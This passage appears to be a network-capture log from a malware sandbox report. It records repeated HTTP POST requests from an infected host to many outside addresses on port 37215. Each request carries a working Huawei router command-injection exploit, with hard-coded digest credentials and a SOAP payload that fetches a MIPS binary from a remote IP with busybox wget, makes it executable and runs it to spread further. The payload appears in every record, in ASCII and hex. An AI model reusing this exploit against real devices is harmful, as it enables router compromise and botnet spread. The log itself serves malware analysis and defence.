                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1389192.168.2.1548002197.220.74.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837532043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1390192.168.2.1535960197.227.246.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837554932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1391192.168.2.1556906157.162.121.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837573051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1392192.168.2.1556192179.132.44.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837589025 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1393192.168.2.1559910197.188.160.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837799072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1394192.168.2.153312241.199.144.11637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837816954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1395192.168.2.1538010157.201.160.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837831020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1396192.168.2.155089241.220.14.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837850094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1397192.168.2.1533612157.112.67.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837867975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1398192.168.2.1550322157.117.29.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.837897062 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
